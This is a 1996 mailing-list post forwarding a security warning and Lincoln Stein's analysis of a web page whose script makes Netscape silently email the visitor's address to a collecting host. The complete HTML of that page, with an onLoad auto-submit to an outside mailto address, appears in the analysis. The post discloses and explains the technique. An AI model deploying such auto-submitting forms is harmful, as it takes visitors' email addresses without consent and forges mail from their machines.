This is something that i had not seen posted here as of yet. (Sorry if it has. My mail feed has been suffering from altzheimers as of late and getting progressivly worse...) Crypto Relevance: None Privacy Relevance: Lots This was forwarded to me by the "CGI Guy" at Teleport. I had heard this was possible. I was quite surprised to find just how *easy* this is! I can see a number of creative (and scary) uses for this little hack. (This makes JavaScript seem more like a coffee enema.) --------- Forwarded message ---------------
Well, here it is... I've been yelling about Netscape's use of the action="maito:user@place.com" for a long time. By clicking on a submit button (with any name) you can grab the user's email address, sig file and other prefs.
JavaScript in Netscape 2.0 removes the necessary "click." I'm sending visitors to my site a notification of this problem.
Robert Muhlestein Teleport Creative Services CGI Guy cgi@teleport.com
---------- Forwarded message ---------- Date: Mon, 26 Feb 1996 16:52:30 +0100 From: Lincoln Stein <lstein@kaa.crbm.cnrs-mop.fr> To: www-managers@lists.stanford.edu, www-security@ns2.rutgers.edu Cc: lstein@pico.crbm.cnrs-mop.fr Subject: Re: JavaScript to grab e-mail <explained>
I just had a look at the e-mail scamming script (URL http://www.popco.com/grabtest.html). It's quite simple. Here's the complete text:
<HTML> <HEAD> </HEAD> <BODY onLoad="document.mailme.submit()">
<form method=post name="mailme" action="mailto:reply@simenon.popco.com?subject=scammed address">
<h3>Viewing this page automatically submits email to an address which then sends you back email to prove it grabbed the message.</h3>
<input type=hidden name="scammed.the.address" value="did it"> </form>
</BODY> </HTML>
Basically what the script does is to make the browser submit e-mail to the indicated mailto: URL. When the mail is sent, the user's reply address is included as a matter of course.
The good news is that this does _not_ represent a general security hole in JavaScript itself. I was concerned that someone had discovered a way to make JavaScript divulge such browser secrets as the contents of the disk cache, history list, or newsgroup subscriptions.
The bad news is that this technique can be used as a general Internet e-mail forgery system. Anybody accessing a particular page will unwittingly mail out an e-mail message, whose recipient, subject and message body are all under the control of the JavaScript author. If the message is traced back, it will be found to have originated from the user's machine.
Lincoln
--- Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction `finger -l alano@teleport.com` for PGP 2.6.2 key http://www.teleport.com/~alano/ "We had to destroy the Internet in order to save it." - Sen. Exon "I, Caligula Clinton... In the name of the Senate and the people of Rome!" - Bill Clinton signing the CDA with the First Amendment bent over.